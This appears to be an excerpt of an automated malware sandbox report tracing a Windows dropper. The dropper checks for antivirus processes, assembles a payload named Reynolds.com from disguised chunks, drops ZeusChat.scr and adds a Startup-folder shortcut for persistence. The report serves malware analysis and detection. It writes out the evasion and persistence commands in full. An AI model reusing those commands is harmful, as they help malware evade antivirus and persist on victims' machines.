              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comProcess created: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com C:\Users\user\AppData\Local\Temp\29442\Reynolds.com
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comProcess created: C:\Windows\explorer.exe explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrProcess created: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr"
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrProcess created: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr"
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrProcess created: C:\Windows\explorer.exe explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Bukkake Bukkake.cmd && Bukkake.cmdJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 29442Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Wendy + ..\Psychiatry + ..\Rid + ..\Games + ..\Norway + ..\Matching + ..\Jungle + ..\Elliott + ..\Jpg + ..\Americans + ..\Exhibits + ..\Peeing + ..\Typical + ..\Innocent + ..\Seafood + ..\Nervous + ..\Households + ..\Ai + ..\Hotel + ..\Holdem + ..\Drums + ..\Carlo + ..\Tm + ..\Landscape + ..\Resolutions + ..\Def + ..\Lambda + ..\Biodiversity + ..\Odds + ..\Smithsonian + ..\Blvd + ..\Actual + ..\Guy + ..\Expert + ..\Delaware + ..\Eagle + ..\Eugene + ..\Exempt + ..\Same + ..\Ebooks + ..\Individuals + ..\Sucking + ..\Chan + ..\Turns + ..\Satin + ..\Dealing + ..\Result + ..\Through + ..\Realized lJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com Reynolds.com lJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comProcess created: C:\Windows\System32\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & echo URL="C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & exitJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comProcess created: C:\Users\user\AppData\Local\Temp\29442\Reynolds.com C:\Users\user\AppData\Local\Temp\29442\Reynolds.comJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr" "C:\Users\user\AppData\Local\CyberSphere Dynamics\M"Jump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrProcess created: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr" Jump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrProcess created: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr "C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scr" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comSection loaded: napinsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comSection loaded: wshbth.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comSection loaded: nlaapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comSection loaded: winrnr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrSection loaded: napinsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrSection loaded: wshbth.dllJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrSection loaded: nlaapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrSection loaded: winrnr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: file.exeStatic file information: File size 4389991 > 1048576
              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: autorunsc64a.pdb source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: autorunsc64a.pdb= source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Autoruns.pdb source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Autoruns64a.pdb source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Autoruns64.pdb source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: autorunsc.pdb source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: utorunsc.pdb source: explorer.exe, 00000012.00000002.3264572586.000000000162E000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: explorer.exe, 00000012.00000003.2516037085.00000000054AC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3265796424.00000000054CB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2312256260.0000000001350000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2354445600.00000000054AC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2703350861.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2672721393.00000000054CC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2550085788.00000000054CD000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: utorunsc64.pdb source: explorer.exe, 00000012.00000002.3264572586.000000000162E000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: autorunsc64.pdb source: explorer.exe, 00000012.00000002.3264299114.0000000001318000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: utoruns64a.pdb source: explorer.exe, 00000012.00000002.3264572586.000000000162E000.00000004.00000010.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
              Source: file.exeStatic PE information: real checksum: 0x43515c should be: 0x42fd74
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_000002453CA21394 push qword ptr [000002453CA34004h]; ret 17_2_000002453CA21403
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_000002453CA23A16 push rdx; iretd 17_2_000002453CA23A17
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_000002453CA23788 push rdx; iretd 17_2_000002453CA23789
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA127149 push rdi; ret 17_2_00007FF7AA127152
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA1276AD push rdi; ret 17_2_00007FF7AA1276B4
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF752037149 push rdi; ret 20_2_00007FF752037152
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF7520376AD push rdi; ret 20_2_00007FF7520376B4
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 21_2_0000014D5CA91394 push qword ptr [0000014D5CAA4004h]; ret 21_2_0000014D5CA91403
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 21_2_0000014D5CA93A16 push rdx; iretd 21_2_0000014D5CA93A17
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 21_2_0000014D5CA93788 push rdx; iretd 21_2_0000014D5CA93789

              Persistence and Installation Behavior

              barindex
              Drops PE files with a suspicious file extension
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comFile created: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrJump to dropped file
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comFile created: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrJump to dropped file
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comJump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\TechJump to dropped file
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\TechJump to dropped file
              Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.urlJump to behavior
              Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.urlJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comCode function: 17_2_00007FF7AA114364 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,17_2_00007FF7AA114364
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrCode function: 20_2_00007FF752024364 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,20_2_00007FF752024364
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4326Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 510Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\29442\Reynolds.comAPI coverage: 0.2 %
              Source: C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.scrAPI coverage: 1.6 %
              Source: C:\Windows\explorer.exe TID: 6208Thread sleep count: 4326 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 6208Thread sleep time: -86520s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 6208Thread sleep count: 510 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 6208Thread sleep count: 32 > 30Jump to behavior
              Source: C:\Windows\explorer.exe TID: 6208Thread sleep count: 133 > 30Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
